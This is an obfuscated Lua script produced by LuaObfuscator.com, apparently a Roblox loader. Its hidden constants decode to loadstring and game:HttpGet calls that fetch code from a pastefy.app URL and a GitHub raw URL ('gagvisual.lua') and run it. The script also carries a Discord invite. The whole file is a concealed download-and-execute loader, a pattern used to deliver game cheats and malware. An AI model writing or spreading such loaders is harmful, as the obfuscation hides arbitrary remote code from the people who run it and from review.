--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v91=v5(v83,v19);v19=nil;return v91;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((5 -3)^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + (941 -(282 + 595)))))) + ((2569 -(1523 + 114)) -(857 + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=927 -(214 + 641 + 72) ;local v87;while true do if (v86==0) then v87=2^(v32-1) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=0;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(1065 -(68 + (1114 -(32 + 85))))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=(4 + 0) -3 ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==(958 -(892 + (245 -(67 + 113))))) then return (v38 * 256) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + ((3 + 0) -1) );v18=v18 + (3 -1) ;v36=351 -(87 + 263) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v42 * (66680831 -(90523321 -40619706))) + (v41 * (66488 -(802 + 150))) + (v40 * (689 -433)) + v39 ;end local function v24() local v43=0 + (0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(998 -(915 + (941 -(814 + 45))))) then v46=2 -(2 -1) ;v47=(v20(v45,1 + 0 ,20) * ((2 -0)^(1219 -(58 + 1011 + 118)))) + v44 ;v43=4 -2 ;end if (v43==(3 -(1 + 0))) then v48=v20(v45,21,(891 -(261 + 624)) + 25 );v49=((v20(v45,32)==(1 -0)) and  -(1 + 0)) or (792 -(368 + 423)) ;v43=9 -6 ;end if (v43==0) then v44=v23();v45=v23();v43=19 -(10 + 8) ;end if (v43==(11 -8)) then if (v48==(442 -(416 + 26))) then if (v47==(0 -0)) then return v49 * ((0 -0) + 0) ;else local v101=0 -0 ;while true do if (v101==(438 -((1225 -(1020 + 60)) + 293))) then v48=431 -(44 + 386) ;v46=1486 -(998 + 488) ;break;end end end elseif (v48==(651 + 1396)) then return ((v47==(0 + 0)) and (v49 * ((773 -((1624 -(630 + 793)) + 571))/(1138 -((392 -276) + 1022))))) or (v49 * NaN) ;end return v8(v49,v48-(4258 -3235) ) * (v46 + (v47/((2 + 0)^(189 -137)))) ;end end end local function v25(v50) local v51=(0 + 0) -0 ;local v52;local v53;while true do if (v51==(2 + 1)) then return v6(v53);end if ((3 -(1057 -(87 + 968)))==v51) then v52=v3(v16,v18,(v18 + v50) -(1748 -(760 + 987)) );v18=v18 + v50 ;v51=1915 -(1789 + 124) ;end if (v51==(766 -(745 + 21))) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1 + 0 ;end if (v51==(5 -3)) then v53={};for v92=3 -2 , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=1 + 2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 -0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do local v68=(function() return 0 + 0 ;end)();while true do if (1~=v68) then else if (v54==(2 + 1)) then for v102= #"~",v23() do local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();while true do if (v103~=(0 -0)) then else v104=(function() return v21();end)();if (v20(v104, #" ", #":")~=0) then else local v177=(function() return 0 + 0 ;end)();local v178=(function() return;end)();local v179=(function() return;end)();local v180=(function() return;end)();while true do if ((1637 -(1373 + 263))==v177) then local v192=(function() return 1000 -(451 + 549) ;end)();local v193=(function() return;end)();while true do if (v192==(0 + 0)) then v193=(function() return 0;end)();while true do if ((0 -0)==v193) then local v203=(function() return 0;end)();while true do if (v203==1) then v193=(function() return 1 -0 ;end)();break;end if (0==v203) then v180=(function() return {v22(),v22(),nil,nil};end)();if (v178==(0 + 0)) then local v205=(function() return 0 -0 ;end)();local v206=(function() return;end)();while true do if (v205==(341 -(218 + 123))) then v206=(function() return 0;end)();while true do if (0~=v206) then else v180[ #"19("]=(function() return v22();end)();v180[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v178== #"}") then v180[ #"-19"]=(function() return v23();end)();elseif (v178==(1583 -(1535 + 46))) then v180[ #"gha"]=(function() return v23() -((2 + 0)^16) ;end)();elseif (v178== #"asd") then local v212=(function() return 0 + 0 ;end)();local v213=(function() return;end)();while true do if (0~=v212) then else v213=(function() return 0;end)();while true do if (v213==(560 -(306 + 254))) then v180[ #"xnx"]=(function() return v23() -(2^(1 + 15)) ;end)();v180[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v203=(function() return 1 -0 ;end)();end end end if (v193==1) then v177=(function() return 1469 -(899 + 568) ;end)();break;end end break;end end end if (v177==0) then local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (v194==0) then v195=(function() return 0;end)();while true do if (v195==(0 + 0)) then v178=(function() return v20(v104,2, #"91(");end)();v179=(function() return v20(v104, #".dev",6);end)();v195=(function() return 2 -1 ;end)();end if (v195~=1) then else v177=(function() return 1;end)();break;end end break;end end end if (v177==(605 -(268 + 335))) then if (v20(v179, #"[", #"{")~= #"/") then else v180[2]=(function() return v61[v180[2]];end)();end if (v20(v179,2,292 -(60 + 230) )~= #"}") then else v180[ #"xnx"]=(function() return v61[v180[ #"91("]];end)();end v177=(function() return 3;end)();end if (v177~=3) then else if (v20(v179, #"91(", #"asd")== #"[") then v180[ #"0313"]=(function() return v61[v180[ #".com"]];end)();end v56[v102]=(function() return v180;end)();break;end end end break;end end end for v105= #",",v23() do v57,v105,v28=(function() return v55(v57,v105,v28);end)();end return v59;end if (2==v54) then local v98=(function() return 0;end)();local v99=(function() return;end)();while true do if (0==v98) then v99=(function() return 0;end)();while true do if (v99~=(572 -(426 + 146))) then else v61=(function() return {};end)();for v183= #",",v60 do local v184=(function() return 0 + 0 ;end)();local v185=(function() return;end)();local v186=(function() return;end)();local v187=(function() return;end)();while true do if (v184==(1456 -(282 + 1174))) then v185=(function() return 811 -(569 + 242) ;end)();v186=(function() return nil;end)();v184=(function() return 1;end)();end if (v184~=1) then else v187=(function() return nil;end)();while true do if (v185==(0 -0)) then v186=(function() return v21();end)();v187=(function() return nil;end)();v185=(function() return 1 + 0 ;end)();end if (v185==1) then if (v186== #":") then v187=(function() return v21()~=0 ;end)();elseif (v186==2) then v187=(function() return v24();end)();elseif (v186== #"-19") then v187=(function() return v25();end)();end v61[v183]=(function() return v187;end)();break;end end break;end end end v99=(function() return 1025 -(706 + 318) ;end)();end if (v99~=(1252 -(721 + 530))) then else v59[ #"xnx"]=(function() return v21();end)();v54=(function() return 1274 -(945 + 326) ;end)();break;end end break;end end end break;end if (v68==(0 -0)) then if (v54~=(1 + 0)) then else v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v54=(function() return 702 -(271 + 429) ;end)();end if (v54~=0) then else local v100=(function() return 0;end)();while true do if (v100==0) then v55=(function() return function(v162,v163,v164) local v165=(function() return 0 + 0 ;end)();local v166=(function() return;end)();while true do if (v165==(1500 -(1408 + 92))) then v166=(function() return 0;end)();while true do if (v166==0) then local v200=(function() return 0;end)();local v201=(function() return;end)();while true do if (v200~=0) then else v201=(function() return 1086 -(461 + 625) ;end)();while true do if (v201==(1288 -(993 + 295))) then local v204=(function() return 0 + 0 ;end)();while true do if (v204==0) then v162[v163-#"]" ]=(function() return v164();end)();return v162,v163,v164;end end end end break;end end end end break;end end end;end)();v56=(function() return {};end)();v100=(function() return 1172 -(418 + 753) ;end)();end if (v100==(1 + 0)) then v57=(function() return {};end)();v54=(function() return 1 + 0 ;end)();break;end end end v68=(function() return 1 + 0 ;end)();end end end end local function v29(v62,v63,v64) local v65=v62[1203 -(373 + 829) ];local v66=v62[(1 -0) + 1 ];local v67=v62[(152 + 380) -(406 + 123) ];return function(...) local v69=v65;local v70=v66;local v71=v67;local v72=v27;local v73=1 + 0 ;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -(1 -0) ;local v78={};local v79={};for v88=238 -(64 + (410 -(141 + 95))) ,v77 do if ((713<=847) and (v88>=v71)) then v75[v88-v71 ]=v76[v88 + 1 + 0 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + (1 -0) ;local v81;local v82;while true do v81=v69[v73];v82=v81[1 + 0 + 0 ];if ((2154<=4031) and (v82<=(1328 -(1249 + (187 -114))))) then if ((v82<=(1 + 1)) or (3790==500)) then if ((89<221) and (v82<=(1145 -(466 + 679)))) then v79[v81[4 -(4 -2) ]]=v81[3 + 0 ]~=(0 -0) ;elseif (v82==(1901 -(106 + 1794))) then v79[v81[1506 -(363 + 1141) ]]();else do return;end end elseif (v82<=(2 + 2)) then if ((2054>=1421) and (v82==(1 + 2))) then v79[v81[5 -3 ]]=v81[7 -4 ];else local v110=v81[116 -(4 + 110) ];local v111,v112=v72(v79[v110](v13(v79,v110 + ((138 + 447) -((156 -99) + 527)) ,v81[2 + 1 ])));v74=(v112 + v110) -(2 -1) ;local v113=1427 -(41 + 1386) ;for v167=v110,v74 do v113=v113 + (104 -(17 + 86)) ;v79[v167]=v111[v113];end end elseif (v82>(4 + 1)) then if (v79[v81[3 -1 ]]==v81[1665 -(1477 + 184) ]) then v73=v73 + (2 -1) ;else v73=v81[(119 + 50) -(122 + 44) ];end else local v114=856 -(564 + 292) ;local v115;while true do if ((0 -0)==v114) then v115=v81[6 -4 ];v79[v115]=v79[v115](v13(v79,v115 + 1 + 0 + 0 ,v74));break;end end end elseif (v82<=(2 + (9 -2))) then if (v82<=(13 -6)) then local v107=v81[67 -(30 + 35) ];v79[v107](v79[v107 + 1 + 0 ]);elseif (v82>(7 + 1)) then for v170=v81[(282 + 196) -(41 + 435) ],v81[1260 -(1043 + 214) ] do v79[v170]=nil;end else v79[v81[(170 -(92 + 71)) -5 ]]=v64[v81[3]];end elseif ((692<3058) and (v82<=(1223 -(323 + 889)))) then if (((4615==4615) and (v82==(1135 -(936 + 94 + 95)))) or (3254==1655)) then local v118=v81[5 -3 ];local v119=v79[v81[(2716 -1100) -(1565 + (813 -(574 + 191))) ]];v79[v118 + (581 -(298 + 63 + (548 -329))) ]=v119;v79[v118]=v119[v81[3 + 1 + 0 ]];else v73=v81[(1172 -(254 + 595)) -(53 + 267) ];end elseif (v82>(3 + 9)) then local v124;local v125,v126;local v127;local v128;v79[v81[2]]=v64[v81[416 -((141 -(55 + 71)) + 398) ]];v73=v73 + ((1294 -311) -(18 + (2754 -(573 + 1217)))) ;v81=v69[v73];v128=v81[7 -5 ];v127=v79[v81[2 + 1 ]];v79[v128 + 1 + 0 ]=v127;v79[v128]=v127[v81[14 -10 ]];v73=v73 + (851 -(20 + 830)) ;v81=v69[v73];v79[v81[2 + 0 ]]=v81[129 -(116 + 10) ];v73=v73 + (2 -1) ;v81=v69[v73];v128=v81[1 + 1 ];v125,v126=v72(v79[v128](v13(v79,v128 + (739 -(542 + (542 -346))) ,v81[6 -3 ])));v74=(v126 + v128) -(1 + 0) ;v124=0 -0 ;for v172=v128,v74 do v124=v124 + 1 + 0 ;v79[v172]=v125[v124];end v73=v73 + 1 + 0 ;v81=v69[v73];v128=v81[4 -2 ];v79[v128]=v79[v128](v13(v79,v128 + (2 -1) ,v74));v73=v73 + (1190 -(35 + 414 + 740)) ;v81=v69[v73];v79[v81[874 -(826 + 46) ]]();v73=v73 + (948 -(245 + 702)) ;v81=v69[v73];v79[v81[1553 -(1126 + 425) ]]=v64[v81[408 -(118 + 287) ]];v73=v73 + (3 -2) ;v81=v69[v73];v79[v81[1123 -(118 + 1003) ]]=v64[v81[8 -5 ]];v73=v73 + (378 -((228 -86) + 235)) ;v81=v69[v73];v128=v81[9 -7 ];v127=v79[v81[1 + 2 ]];v79[v128 + ((1917 -(714 + 225)) -(553 + 424)) ]=v127;v79[v128]=v127[v81[(20 -13) -3 ]];v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[2]]=v81[3 + 0 ];else local v150;local v151,v152;local v153;v153=v81[2 + 0 ];v151,v152=v72(v79[v153](v13(v79,v153 + 1 ,v81[6 -3 ])));v74=(v152 + v153) -(1 + 0) ;v150=0 + 0 ;for v175=v153,v74 do local v176=0 -0 ;while true do if ((0 -0)==v176) then v150=v150 + (2 -1) ;v79[v175]=v151[v150];break;end end end v73=v73 + 1 + 0 ;v81=v69[v73];v153=v81[216 -(22 + 192) ];v79[v153]=v79[v153](v13(v79,v153 + (684 -(483 + 200)) ,v74));v73=v73 + (4 -3) ;v81=v69[v73];v79[v81[755 -(239 + 514) ]]=v81[2 + 1 ];v73=v73 + (1330 -(797 + 532)) ;v81=v69[v73];v153=v81[(2 -0) + 0 ];v79[v153](v79[v153 + ((61 + 502) -(334 + 228)) ]);v73=v73 + 1 + 0 ;v81=v69[v73];v73=v81[(14 -4) -7 ];end v73=v73 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F5636626B49786E6B2F72617703503Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F663473686E2F6D61696E2F726566732F68656164732F6D61696E2F67616D65732F67616776697375616C2E6C756103153Q00646973636F72642E2Q672F63737875326E436B7739001C3Q0012033Q00014Q0009000100013Q0026063Q00020001000100040B3Q00020001001203000100013Q002606000100050001000100040B3Q00050001001208000200023Q00120D000300033Q00202Q00030003000400122Q000500056Q000300056Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400122Q000500066Q000600014Q000C000300066Q00023Q000200122Q000300076Q00020002000100044Q001B000100040B3Q0005000100040B3Q001B000100040B3Q000200012Q00023Q00017Q00",v9(),...);
